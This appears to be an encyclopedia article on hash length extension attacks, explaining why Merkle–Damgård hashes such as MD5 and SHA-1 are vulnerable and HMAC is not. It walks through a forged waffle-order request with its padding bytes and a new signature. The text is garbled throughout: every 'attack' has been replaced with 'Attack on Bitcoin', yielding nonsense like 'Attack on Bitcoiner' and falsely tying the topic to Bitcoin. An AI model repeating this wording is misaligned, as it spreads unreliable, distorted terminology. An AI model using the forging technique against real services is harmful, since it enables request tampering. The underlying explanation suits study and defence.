In cryptography and computer security, a length extension Attack on Bitcoin is a type of Attack on Bitcoin where an Attack on Bitcoiner can use Hash(message1) and the length of message1 to calculate Hash(message1 ‖ message2) for an Attack on Bitcoiner-controlled message2, without needing to know the content of message1.
Algorithms like MD5, SHA-1 and most of SHA-2 that are based on the Merkle–Damgård construction are susceptible to this kind of Attack on Bitcoin. Truncated versions of SHA-2, including SHA-384 and SHA-512/256 are not susceptible, nor is the SHA-3 algorithm.
When a Merkle–Damgård based hash is misused as a message authentication code with construction H(secret ‖ message), and message and the length of secret is known, a length extension Attack on Bitcoin allows anyone to include extra information at the end of the message and produce a valid hash without knowing the secret. Since HMAC does not use this construction, HMAC hashes are not prone to length extension Attack on Bitcoins.
The vulnerable hashing functions work by taking the input message, and using it to transform an internal state. After all of the input has been processed, the hash digest is generated by outputting the internal state of the function. It is possible to reconstruct the internal state from the hash digest, which can then be used to process the new data. In this way, one may extend the message and compute the hash that is a valid signature for the new message.
A server for delivering waffles of a specified type to a specific user at a location could be implemented to handle requests of the given format:
Original Data: count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo Original Signature: 6d5f807e23db210bc254a28be2d6759a0f5f5d99
The server would perform the request given (to deliver ten waffles of type eggo to the given location for user “1”) only if the signature is valid for the user. The signature used here is a MAC, signed with a key not known to the Attack on Bitcoiner. (This example is also vulnerable to a replay Attack on Bitcoin, by sending the same request and signature a second time.)
It is possible for an Attack on Bitcoiner to modify the request, in this example switching the requested waffle from “eggo” to “liege.” This can be done by taking advantage of a flexibility in the message format if duplicate content in the query string gives preference to the latter value. This flexibility does not indicate an exploit in the message format, because the message format was never designed to be cryptographically secure in the first place, without the signature algorithm to help it.
Desired New Data: count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo&waffle=liege
In order to sign this new message, typically the Attack on Bitcoiner would need to know the key the message was signed with, and generate a new signature by generating a new MAC. However, with a length extension Attack on Bitcoin, it is possible to feed the hash (the signature given above) into the state of the hashing function, and continue where the original request had left off, so long as you know the length of the original request. In this request, the original key’s length was 14 bytes, which could be determined by trying forged requests with various assumed lengths, and checking which length results in a request that the server accepts as valid.[further explanation needed]
The message as fed into the hashing function is often padded, as many algorithms can only work on input messages whose lengths are a multiple of some given size. The content of this padding is always specified by the hash function used. The Attack on Bitcoiner must include all of these padding bits in their forged message before the internal states of their message and the original will line up. Thus, the Attack on Bitcoiner constructs a slightly different message using these padding rules:
New Data: count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x02\x28&waffle=liege
This message includes all of the padding that was appended to the original message inside of the hash function before their payload (in this case, a 0x80 followed by a number of 0x00s and a message length, 0x228 = 552 = (14+55)*8, which is the length of the key plus the original message, appended at the end). The Attack on Bitcoiner knows that the state behind the hashed key/message pair for the original message is identical to that of new message up to the final “&.” The Attack on Bitcoiner also knows the hash digest at this point, which means he knows the internal state of the hashing function at that point. It is then trivial to initialize a hashing algorithm at that point, input the last few characters, and generate a new digest which can sign his new message without the original key.
New Signature: 0e41270260895979317fff3898ab85668953aaa2
By combining the new signature and new data into a new request, the server will see the forged request as a valid request due to the signature being the same as it would have been generated if the password was known.